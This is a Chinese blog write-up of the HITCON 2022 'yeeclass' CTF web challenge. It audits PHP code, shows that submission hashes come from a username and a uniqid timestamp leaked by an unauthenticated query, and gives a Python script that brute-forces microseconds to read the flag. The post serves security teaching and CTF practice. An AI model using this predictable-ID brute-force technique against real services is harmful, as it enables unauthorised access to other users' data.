2022-HitCon-Web-yeeclass WP

最新推荐文章于 2024-04-22 09:32:44 发布
最新推荐文章于 2024-04-22 09:32:44 发布
阅读量1.9k 收藏 3
点赞数 6
文章标签: php web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66748496/article/details/128454462
版权

复现平台CTFHUB
靶机为一个完整类论坛网页,题目给了服务端完整代码

代码审计

/src/submit.php Line56-63:
在这里插入图片描述
可以看到提交数据存入的时候将$_SESSION["username"]."_"作为前缀,生成了一个uniqid。uniqid的生成方式即{sec:08x}{usec:05x}

/src/submission.php Line5-15:

在这里插入图片描述在该查询界面中首选了hash参数作为查询方式,
意味着如果获得存入数据库的时间username即可模拟出hash从而读取flag

/src/submission.php Line16-44:
在这里插入图片描述

允许了通过homeworkid查询入库时间username

解题

在没有登录没有session访问challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?homeworkid=1得到提交时间username

而入库时间和uniqid由于运行效率,会存在微秒时间差,因而需要爆破该时间差

exp

import requests
import hashlib
from datetime import datetime, timezone

username = "flagholder"
timestamp = '2022-12-26 20:59:48.231534'

dt = datetime.fromisoformat(timestamp)#.replace(tzinfo=timezone.utc)
sec = int(dt.timestamp())
usec = dt.microsecond
print(sec, usec)

url = 'http://challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?hash='

def get_hash(sec, usec):
    user_id = f"{username}_{sec:08x}{usec:05x}"
    return hashlib.sha1(user_id.encode()).hexdigest()

for i in range(0, 1000):
    hash = get_hash(sec, usec - i)
    r = requests.get(url + hash)
    print(i, hash)
    if r.text != "Submission not found.":
        print("Found hash:", hash)
        print(r.text)
        break

运行结果:
在这里插入图片描述

randomErr
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节暂时不能完全公开(已经打了马赛克)。等微软修补以后我会公开。
C++ Emloyee类3.14
weixin_74287172的博客
04-29 408
1)该类包括了作为数据成员的3部分信息:名(类型:string)、姓(类型:string)、月薪(类型:int)。1)该类包括了作为数据成员的3部分信息:名(类型:string)、姓(类型:string)、月薪(类型:int)。3)对每个数据成员都提供一个设置函数和一个获取函数。如果月薪是负数,那么设置为0。(Emloyee类)创建一个名为Employee(雇员)的类。2)这个类还必须包括一个初始化前述的3个数据成员的构造函数。2)这个类还必须包括一个初始化前述的3个数据成员的构造函数。
CTFHub通关
weixin_43184518的博客
07-06 7951
CTFHub通关 这篇文章主要为我在ctfhub上的通关过程,作为记录方便以后查看。
C++考试题目(定义一个雇员类Employee,自定义三个以上成员变量)
weixin_56105279的博客
12-22 1316
#include<iostream.h> class Employee{ private: string cardNo;//卡号 string name;//姓名 string idCard;//身份证号 string tel;//电话 public: void setCardNo(string cn){ cardNo = cn;//卡号 } void setName(string n) { name = n;//姓名 } string getCardNp() { return cardNo;
Hitcon CTF 2022 Web RCE
qq_66748496的博客
12-29 1284
Hitcon CTF, ctfhub提供了复现平台 来自Hitcon早些时候的比赛,算作是我的Nodejs安全入门。
[HITCON CTF 2022] Superprime,rev Meow_way,BabySSS格基约减法,Secret共模攻击模未知
weixin_52640415的博客
12-02 697
RSA p,q相关 3种爆破方式 10进制
[HITCON CTF 2022] crypto bypass
weixin_52640415的博客
11-29 648
中国剩余定理 AES MODE_CTF nonce
HITCON2017-Web-writeup
无节操
10-27 1778
HITCON2017-Web-writeupProblemsbabyfirst-revenge Problems babyfirst-revenge Description: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @ch...
还原HITCON 2016一道web题(php反序列化漏洞)
洞若观火
07-27 3279
实验环境搭建:PHPstudy,火狐(backbar),notepad++; 原题目代码:https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick 本人在还原此题目时,因为mysql数据库用户名密码和方便调试等原因对源码的一些参数做了一些相应的改动,但是没有改变主要代码。 c...
HITCTF2022-WEB2-easypop
weixin_43610673的博客
12-01 645
f::ev1l 函数那的判断用浮点数精度绕过。还有一段正则过滤要处理。
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON-ZeroDay年度报告.pdf
08-28
HITCON-ZeroDay年度报告 安全研究 安全研究 信息安全研究 安全开发 渗透测试
Prototype使用Class
owen_william的博客
05-08 605
1.前言 Class对象主要提供如下的两个方法。 1)        create([superclass][,methods…]):定义一个新类,该新类继承superclass类里所有方法。 2)        addMethod(methods):扩展已有的类,该方法为一个已有的类新增方法,或者覆盖原有的方法。 2.例子  使用Class // 定义一个
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 6万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
【Java】 JPA介绍
ljinest
11-17 2397
JPA介绍 JPA(Java Persistence API)是一系列类、方法,用于将大量数据储持久地存到数据库中。 企业级应用中,通过存储和检索大量数据来执行数据库操作。使用JPA,会使与数据库交互的负担大大减少。它在对象模型(Java Objects)和关系模型(数据库程序)之间架起一座桥梁。 关系模型和对象模型之间的不匹配 关系对象以表格的形式表示,而对象模型是以对象格式的相互关系来表示的。在从关系模型中存储和检索一个对象模型时,往往会由于以下的原因发生不匹配: 颗粒度:对象关系往往有更细的颗粒度
探索云课堂回放: Yeefire's Cloud Class Replay
最新发布
gitblog_00091的博客
04-22 276
探索云课堂回放: Yeefire's Cloud Class Replay 项目地址:https://gitcode.com/yeefire/cloud-class-replay 项目简介 Cloud Class Replay 是一个开源项目,旨在为在线教育场景提供高质量、功能丰富的视频回放服务。它由 Yeefire 团队开发,专注于解决在线课程录制与播放的问题,让教师和学生能够轻松回顾课堂内容,...
简单java游戏代码_Java经典小游戏——贪吃蛇简单实现(附源码)
weixin_29711757的博客
02-12 4912
一、使用知识JframeGUI双向链表线程二、使用工具IntelliJ IDEAjdk 1.8三、开发过程3.1素材准备首先在开发之前应该准备一些素材,已备用,我主要找了一个图片以及一段优雅的音乐。在这里插入图片描述3.2 开发过程3.2.1 创建项目首先进入idea首页 open一个你想放项目的文件夹在这里插入图片描述进入之后右键文件名 new 一个新的Directory——Snake在这里插入...
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值